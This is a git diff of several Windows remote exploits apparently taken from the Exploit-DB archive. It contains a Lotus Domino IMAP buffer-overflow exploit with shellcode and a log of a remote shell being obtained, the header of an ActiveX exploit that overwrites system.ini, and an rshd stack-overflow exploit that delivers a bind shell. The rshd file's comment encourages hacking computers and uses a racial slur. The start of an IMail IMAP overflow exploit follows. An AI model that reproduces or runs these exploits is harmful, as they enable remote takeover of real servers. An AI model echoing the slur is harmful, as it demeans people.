- "\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0" - "\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad" - "\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f" - "\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1" - "\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50" - "\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf" - "\xa4\x7d\x2e\x7f\x27\x82\xf8\x80") - - try: - s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) - connect=s.connect((host,port)) - d=s.recv(1024) - print "[*] sending payload" - s.send('a001 admin ' + payload + '\r\n') - d=s.recv(1024) - s.close() - except: - "Can't connect to IMAP server" - -def usage(): - print sys.argv[0] + "\n\n\tLotus Domino 6.5.4 Windows 2000 Advanced Server x86 Exploit\n\tauthor: dmc@digitalapocalypse.net & prdelka" - print "\t-h host" - print "\t-p port" - sys.exit(2) - -def signal_handler(signal, frame): - print 'err: caught sigint, exiting' - sys.exit(0) - -def exp(host, port): - buffer = "\x90" * 193 - buffer += ("\xdb\xd2\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x0a\xbb\x71\x35\x21" - "\xfe\x31\x58\x17\x03\x58\x17\x83\x99\xc9\xc3\x0b\x6a\xe0\x62" - "\x75\x46\xfb\x64\x37\x04\x6e\x79\xef\x65\x40\x41\x0a\x2f\xe9" - "\x56\xac\x9b\x21\x99\x9a\xa8\xb8\x76\x51\x44\x93\xfc\x7d\x67" - "\x0b\xf4\x81") - - try: - s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) - connect=s.connect((host,port)) - d=s.recv(1024) - print d - s.send('a001 authenticate cram-md5\r\n') - d=s.recv(1024) - d=d[2:1022].strip() - print d - m=md5.new() - m.update(d) - digest = m.digest() - buffer += struct.pack(' & prdelka +# +# Exploitation steps: +# 1) The instruction "call dword [ecx]" is performed with user supplied ECX +# 2) EAX reference our buffer from retaddr onward +# 3) we put pointer in ECX to a pointer referencing "call eax" +# 4) a small payload decrements eax and then jmp's into the eax buffer due +# to size limitations. 
+# 5) our larger payload is then executed. +# +# muts exploit would not work for us, his egghunt uses 0x2e which is converted +# to 0x09 (.'s to [tab]'s) and his return address was not found on our test +# environment. +# +# Finding a Target: +# To find a target, attach a debugger to nimap.exe, cause the application +# to crash. Then use search function to find "call eax" or equivilant +# instruction in memory. Then, take the pointer to eax, such as "0x77ff1122" +# and search for another location in memory that has "0x11 0xff 0x77". This +# will be utilised for a return address if no instruction modify eax or +# subvert execution to another place in memory. +# +# Thanks to: nemo, hdm, jf, Winny Thomas, muts +# +########################################################################################### +# Note: it takes a few minutes for the egghunter to find the payload in memory +# +# For example: +# C:\work\exploits\imap>poc.py +# [*] sending payload +# [*] sending payload +# [*] sending payload +# [*] sending payload +# * OK Domino IMAP4 Server Release 6.5.4 ready Tue, 26 Jun 2007 15:18:36 +0100 +# +# PDAwNEU5QkNCLjgwMjU3MzA2LjAwMDAwOUY4LjAwMDAwMDA5QERNQz4= +# +# sending... +# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ +# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ +# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ +# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkNvS2XQk9FgpybEKu3E1If4xWBcDWBeDmcnDC2rgYnVG+2Q3 +# BG5572VAQQov6VasmyGZmqi4dlFEk/x9Zwv0gcDrZXeQkJCD6FKD6FKD6FL/4CB4OcnLXAvHq421 +# M2iR5FFG +# +# +# C:\work\exploits\imap>nc -vv 192.168.126.130 4444 +# 2KVM-DC [192.168.126.130] 4444 (?) open +# Microsoft Windows 2000 [Version 5.00.2195] +# (C) Copyright 1985-1999 Microsoft Corp. 
+# +# E:\Lotus\Domino> +# +########################################################################################### + +import socket, struct, md5, base64, sys, string, signal, getopt + + +class Exp_Lotus: + def __init__(self): + self.host='127.0.0.1' + self.port=143 + + +def send_payload(host,port): + payload ="\x54\x30\x30\x57\x54\x30\x30\x57" + payload += ("\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7" + "\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f" + "\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b" + "\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19" + "\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8" + "\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b" + "\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b" + "\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0" + "\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50" + "\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82" + "\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3" + "\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61" + "\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8" + "\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9" + "\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7" + "\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0" + "\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad" + "\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f" + "\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1" + "\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50" + "\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf" + "\xa4\x7d\x2e\x7f\x27\x82\xf8\x80") + + try: + s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) + connect=s.connect((host,port)) + d=s.recv(1024) + print "[*] sending payload" + 
s.send('a001 admin ' + payload + '\r\n') + d=s.recv(1024) + s.close() + except: + "Can't connect to IMAP server" + +def usage(): + print sys.argv[0] + "\n\n\tLotus Domino 6.5.4 Windows 2000 Advanced Server x86 Exploit\n\tauthor: dmc@digitalapocalypse.net & prdelka" + print "\t-h host" + print "\t-p port" + sys.exit(2) + +def signal_handler(signal, frame): + print 'err: caught sigint, exiting' + sys.exit(0) + +def exp(host, port): + buffer = "\x90" * 193 + buffer += ("\xdb\xd2\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x0a\xbb\x71\x35\x21" + "\xfe\x31\x58\x17\x03\x58\x17\x83\x99\xc9\xc3\x0b\x6a\xe0\x62" + "\x75\x46\xfb\x64\x37\x04\x6e\x79\xef\x65\x40\x41\x0a\x2f\xe9" + "\x56\xac\x9b\x21\x99\x9a\xa8\xb8\x76\x51\x44\x93\xfc\x7d\x67" + "\x0b\xf4\x81") + + try: + s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) + connect=s.connect((host,port)) + d=s.recv(1024) + print d + s.send('a001 authenticate cram-md5\r\n') + d=s.recv(1024) + d=d[2:1022].strip() + print d + m=md5.new() + m.update(d) + digest = m.digest() + buffer += struct.pack(' ------------------------------------------------------------------------------------------------ - Data Dynamics ActiveReport ActiveX Control (actrpt2.dll <= 2.5) "SaveLayout()" Inscure Method - url: http://www.datadynamics.com/default.aspx - - author: shinnai - mail: shinnai[at]autistici[dot]org - site: http://shinnai.altervista.org - - This was written for educational purpose. Use it at your own risk. - Author will be not be responsible for any damage. - - THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF - IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART! - - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 - all software that use this ocx are vulnerable to this exploits. 
- - This control is marked as: - RegKey Safe for Script: True - RegKey Safe for Init: True - Implements IObjectSafety: False - KillBitSet: False ------------------------------------------------------------------------------------------------ - - - - - - - - - -# milw0rm.com [2007-07-21] +
    +-----------------------------------------------------------------------------------------------
    + Data Dynamics ActiveReport ActiveX Control (actrpt2.dll <= 2.5) "SaveLayout()" Inscure Method
    + url: http://www.datadynamics.com/default.aspx
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + This was written for educational purpose. Use it at your own risk.
    + Author will be not be responsible for any damage.
    + 
    + THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
    + IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
    +
    + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
    + all software that use this ocx are vulnerable to this exploits.
    +
    + This control is marked as:
    + RegKey Safe for Script: True
    + RegKey Safe for Init: True
    + Implements IObjectSafety: False
    + KillBitSet: False
    +-----------------------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
+# milw0rm.com [2007-07-21]
diff --git a/platforms/windows/remote/421.c b/platforms/windows/remote/421.c
index 43f50b9c0..6b9d8f0b0 100755
--- a/platforms/windows/remote/421.c
+++ b/platforms/windows/remote/421.c
@@ -440,6 +440,6 @@ shell(sock); } return 0;
-}
-
-// milw0rm.com [2004-08-27]
+}
+
+// milw0rm.com [2004-08-27]
diff --git a/platforms/windows/remote/4217.html b/platforms/windows/remote/4217.html
index 4873bd407..0d55f7fa0 100755
--- a/platforms/windows/remote/4217.html
+++ b/platforms/windows/remote/4217.html
@@ -1,37 +1,37 @@ - -In God We Trust, VDA Labs, LLC - - - - - - -# milw0rm.com [2007-07-24] + +In God We Trust, VDA Labs, LLC + + + + + + +# milw0rm.com [2007-07-24]
diff --git a/platforms/windows/remote/4222.c b/platforms/windows/remote/4222.c
index 48d156b02..2b4db48bb 100755
--- a/platforms/windows/remote/4222.c
+++ b/platforms/windows/remote/4222.c
@@ -1,190 +1,190 @@ -/* -Attached and in-line is an exploit for a newly announced item on -the WabiSabiLabi auction block. I hope this completely devalues the -item so that the original finder dies of starvation. - -DON'T SELL BUGS THROUGH WABISABILABLA - -USE EXPLOITS TO HACK COMPUTERS INSTEAD - -Exploit is for a stack overflow in http://rshd.sourceforge.net. It -took about 35 minutes to find the bug and exploit it on Win2k3 -using the information provided to the public by WabiSabiLabi. - -Expect exploits for the rest of the auction items in the next week. -Mayber sooner if Simon @ snosoft.com stops trying to cyber with me -LOLOLOLOLOLOL niggerdongs. - -J -*/ - -#include -#include -#include -#include -#include -#include - -#define ESIZ 1 + 1 + 1 + 1 + 1 + 1028 - -int -main (int argc, char *argv[]) -{ - unsigned char win32_bindshell[] = // 9999 tcp - "AAAAAAAAAAAAA" - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" - "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66" - "\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32" - "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32" - "\x4a\x7a\x4b\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75" - "\x30\x6e\x6b\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e" - "\x6b\x33\x4c\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56" - "\x78\x6e\x6b\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36" - "\x54\x4e\x6b\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d" - "\x54\x4b\x70\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f" - "\x32\x7a\x4b\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b" - "\x55\x4c\x4b\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46" - "\x6c\x30\x4b\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54" - "\x6c\x4c\x4b\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74" - "\x71\x4b\x6b\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36" - "\x6c\x4c\x4b\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31" - 
"\x4e\x42\x48\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49" - "\x46\x75\x36\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74" - "\x37\x54\x33\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38" - "\x4b\x38\x6d\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f" - "\x79\x4d\x35\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61" - "\x7a\x46\x62\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c" - "\x6d\x41\x47\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70" - "\x53\x51\x53\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62" - "\x48\x36\x47\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31" - "\x78\x6e\x44\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70" - "\x6a\x74\x50\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e" - "\x4d\x64\x6e\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39" - "\x6f\x58\x50\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39" - "\x6f\x79\x46\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a" - "\x33\x51\x78\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e" - "\x36\x51\x45\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72" - "\x48\x30\x63\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37" - "\x59\x58\x4c\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55" - "\x61\x4f\x30\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47" - "\x32\x34\x6c\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c" - "\x6b\x75\x38\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41" - "\x54\x59\x6f\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52" - "\x71\x51\x7a\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e" - "\x30\x50\x68\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a" - "\x76\x50\x6a\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32" - "\x77\x39\x6c\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79" - "\x6f\x6e\x30\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b" - "\x4f\x48\x56\x79\x6f\x4e\x30\x66"; - - char *buf; - int *ptr; - int i, c, sck; - struct sockaddr_in address; - struct hostent *hp; - - 
if (argc < 2) - { - printf ("usage: %s address\n", argv[0]); - exit (-1); - } -// lsd-pl arrayd.c - sck = socket (AF_INET, SOCK_STREAM, 0); - bzero (&address, sizeof (address)); - address.sin_family = AF_INET; - address.sin_port = htons (514); - if (0 != - bind (sck, (struct sockaddr *) &address, sizeof (struct sockaddr_in))) - { - perror ("bind"); - exit (-344); - } - if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1) - { - if ((hp = gethostbyname (argv[1])) == NULL) - { - errno = EADDRNOTAVAIL; - perror ("error"); - exit (-1); - } - memcpy (&address.sin_addr.s_addr, hp->h_addr, 4); - } - if (connect (sck, (struct sockaddr *) &address, sizeof (address)) < 0) - { - perror ("error"); - exit (-1); - } - buf = malloc (ESIZ); - memcpy (buf, "\x00\x41\x00\x41\x00", 5); - memset (buf + 5, 0x41, 1028); - memcpy (buf + 5, win32_bindshell, sizeof (win32_bindshell) - 1); - ptr = (int *) (buf + 5 + 1024); - *ptr = 0x71ae36b7; // call esi in wshtcpip in win2k3 SP1 - write (sck, buf, ESIZ); - close (sck); - sleep (1); - - sck = socket (AF_INET, SOCK_STREAM, 0); - bzero (&address, sizeof (address)); - address.sin_family = AF_INET; - address.sin_port = htons (9999); - if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1) - { - if ((hp = gethostbyname (argv[1])) == NULL) - { - errno = EADDRNOTAVAIL; - perror ("error"); - exit (-1); - } - memcpy (&address.sin_addr.s_addr, hp->h_addr, 4); - } - if (connect (sck, (struct sockaddr *) &address, sizeof (address)) < 0) - { - perror ("error"); - exit (-1); - } - do_shell (sck); - -} - -// cvs_linux_freebsd_HEAP.c -int -do_shell (int sockfd) -{ - while (1) - { - fd_set fds; - FD_ZERO (&fds); - FD_SET (0, &fds); - FD_SET (sockfd, &fds); - if (select (FD_SETSIZE, &fds, NULL, NULL, NULL)) - { - int cnt; - char buf[1024]; - if (FD_ISSET (0, &fds)) - { - if ((cnt = read (0, buf, 1024)) < 1) - { - if (errno == EWOULDBLOCK || errno == EAGAIN) - continue; - else - break; - } - write (sockfd, buf, cnt); - } - if (FD_ISSET (sockfd, 
&fds)) - { - if ((cnt = read (sockfd, buf, 1024)) < 1) - { - if (errno == EWOULDBLOCK || errno == EAGAIN) - continue; - else - break; - } - write (1, buf, cnt); - } - } - } -} - -// milw0rm.com [2007-07-24] +/* +Attached and in-line is an exploit for a newly announced item on +the WabiSabiLabi auction block. I hope this completely devalues the +item so that the original finder dies of starvation. + +DON'T SELL BUGS THROUGH WABISABILABLA + +USE EXPLOITS TO HACK COMPUTERS INSTEAD + +Exploit is for a stack overflow in http://rshd.sourceforge.net. It +took about 35 minutes to find the bug and exploit it on Win2k3 +using the information provided to the public by WabiSabiLabi. + +Expect exploits for the rest of the auction items in the next week. +Mayber sooner if Simon @ snosoft.com stops trying to cyber with me +LOLOLOLOLOLOL niggerdongs. + +J +*/ + +#include +#include +#include +#include +#include +#include + +#define ESIZ 1 + 1 + 1 + 1 + 1 + 1028 + +int +main (int argc, char *argv[]) +{ + unsigned char win32_bindshell[] = // 9999 tcp + "AAAAAAAAAAAAA" + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" + "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66" + "\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32" + "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32" + "\x4a\x7a\x4b\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75" + "\x30\x6e\x6b\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e" + "\x6b\x33\x4c\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56" + "\x78\x6e\x6b\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36" + "\x54\x4e\x6b\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d" + "\x54\x4b\x70\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f" + "\x32\x7a\x4b\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b" + "\x55\x4c\x4b\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46" + "\x6c\x30\x4b\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54" + 
"\x6c\x4c\x4b\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74" + "\x71\x4b\x6b\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36" + "\x6c\x4c\x4b\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31" + "\x4e\x42\x48\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49" + "\x46\x75\x36\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74" + "\x37\x54\x33\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38" + "\x4b\x38\x6d\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f" + "\x79\x4d\x35\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61" + "\x7a\x46\x62\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c" + "\x6d\x41\x47\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70" + "\x53\x51\x53\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62" + "\x48\x36\x47\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31" + "\x78\x6e\x44\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70" + "\x6a\x74\x50\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e" + "\x4d\x64\x6e\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39" + "\x6f\x58\x50\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39" + "\x6f\x79\x46\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a" + "\x33\x51\x78\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e" + "\x36\x51\x45\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72" + "\x48\x30\x63\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37" + "\x59\x58\x4c\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55" + "\x61\x4f\x30\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47" + "\x32\x34\x6c\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c" + "\x6b\x75\x38\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41" + "\x54\x59\x6f\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52" + "\x71\x51\x7a\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e" + "\x30\x50\x68\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a" + "\x76\x50\x6a\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32" + "\x77\x39\x6c\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79" 
+ "\x6f\x6e\x30\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b" + "\x4f\x48\x56\x79\x6f\x4e\x30\x66"; + + char *buf; + int *ptr; + int i, c, sck; + struct sockaddr_in address; + struct hostent *hp; + + if (argc < 2) + { + printf ("usage: %s address\n", argv[0]); + exit (-1); + } +// lsd-pl arrayd.c + sck = socket (AF_INET, SOCK_STREAM, 0); + bzero (&address, sizeof (address)); + address.sin_family = AF_INET; + address.sin_port = htons (514); + if (0 != + bind (sck, (struct sockaddr *) &address, sizeof (struct sockaddr_in))) + { + perror ("bind"); + exit (-344); + } + if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1) + { + if ((hp = gethostbyname (argv[1])) == NULL) + { + errno = EADDRNOTAVAIL; + perror ("error"); + exit (-1); + } + memcpy (&address.sin_addr.s_addr, hp->h_addr, 4); + } + if (connect (sck, (struct sockaddr *) &address, sizeof (address)) < 0) + { + perror ("error"); + exit (-1); + } + buf = malloc (ESIZ); + memcpy (buf, "\x00\x41\x00\x41\x00", 5); + memset (buf + 5, 0x41, 1028); + memcpy (buf + 5, win32_bindshell, sizeof (win32_bindshell) - 1); + ptr = (int *) (buf + 5 + 1024); + *ptr = 0x71ae36b7; // call esi in wshtcpip in win2k3 SP1 + write (sck, buf, ESIZ); + close (sck); + sleep (1); + + sck = socket (AF_INET, SOCK_STREAM, 0); + bzero (&address, sizeof (address)); + address.sin_family = AF_INET; + address.sin_port = htons (9999); + if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1) + { + if ((hp = gethostbyname (argv[1])) == NULL) + { + errno = EADDRNOTAVAIL; + perror ("error"); + exit (-1); + } + memcpy (&address.sin_addr.s_addr, hp->h_addr, 4); + } + if (connect (sck, (struct sockaddr *) &address, sizeof (address)) < 0) + { + perror ("error"); + exit (-1); + } + do_shell (sck); + +} + +// cvs_linux_freebsd_HEAP.c +int +do_shell (int sockfd) +{ + while (1) + { + fd_set fds; + FD_ZERO (&fds); + FD_SET (0, &fds); + FD_SET (sockfd, &fds); + if (select (FD_SETSIZE, &fds, NULL, NULL, NULL)) + { + int cnt; + char buf[1024]; + if 
(FD_ISSET (0, &fds)) + { + if ((cnt = read (0, buf, 1024)) < 1) + { + if (errno == EWOULDBLOCK || errno == EAGAIN) + continue; + else + break; + } + write (sockfd, buf, cnt); + } + if (FD_ISSET (sockfd, &fds)) + { + if ((cnt = read (sockfd, buf, 1024)) < 1) + { + if (errno == EWOULDBLOCK || errno == EAGAIN) + continue; + else + break; + } + write (1, buf, cnt); + } + } + } +} + +// milw0rm.com [2007-07-24] diff --git a/platforms/windows/remote/4223.pl b/platforms/windows/remote/4223.pl index fd05fa77b..b43fa728f 100755 --- a/platforms/windows/remote/4223.pl +++ b/platforms/windows/remote/4223.pl 
@@ -1,151 +1,151 @@ -#!/use/bin/perl -# -# Ipswitch IMail Server 2006 IMAP SEARCH COMMAND Stack Overflow Exploit -# Author: ZhenHan.Liu#ph4nt0m.org -# Date: 2007-07-25 -# Team: Ph4nt0m Security Team (http://www.ph4nt0m.org) -# -# Vuln Found by: Manuel Santamarina Suarez -# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=563 -# -# The Vuln code is here (imap4d32.exe version 6.8.8.1) -# 00418CCA |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8] -# 00418CD0 |. 0FBE11 |MOVSX EDX,BYTE PTR DS:[ECX] -# 00418CD3 |. 83FA 22 |CMP EDX,22 -# 00418CD6 |. 75 2A |JNZ SHORT IMAP4D32.00418D02 -# 00418CD8 |. 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8] -# 00418CDE |. 50 |PUSH EAX ; /String -# 00418CDF |. FF15 84004300 |CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>>; \lstrlenA -# 00418CE5 |. 83E8 02 |SUB EAX,2 -# 00418CE8 |. 50 |PUSH EAX ; /maxlen -# 00418CE9 |. 8B8D 28EFFFFF |MOV ECX,DWORD PTR SS:[EBP-10D8] ; | -# 00418CEF |. 83C1 01 |ADD ECX,1 ; | -# 00418CF2 |. 51 |PUSH ECX ; |src -# 00418CF3 |. 8D55 AC |LEA EDX,DWORD PTR SS:[EBP-54] ; | -# 00418CF6 |. 52 |PUSH EDX ; |dest -# 00418CF7 |. FF15 00024300 |CALL DWORD PTR DS:[<&MSVCR71.strncpy>] ; \strncpy -# 00418CFD |. 83C4 0C |ADD ESP,0C -# 00418D00 |. EB 13 |JMP SHORT IMAP4D32.00418D15 -# 00418D02 |> 8B85 28EFFFFF |MOV EAX,DWORD PTR SS:[EBP-10D8] -# 00418D08 |. 50 |PUSH EAX ; /src -# 00418D09 |. 8D4D AC |LEA ECX,DWORD PTR SS:[EBP-54] ; | -# 00418D0C |. 51 |PUSH ECX ; |dest -# 00418D0D |. E8 7E610100 |CALL ; \strcpy -# 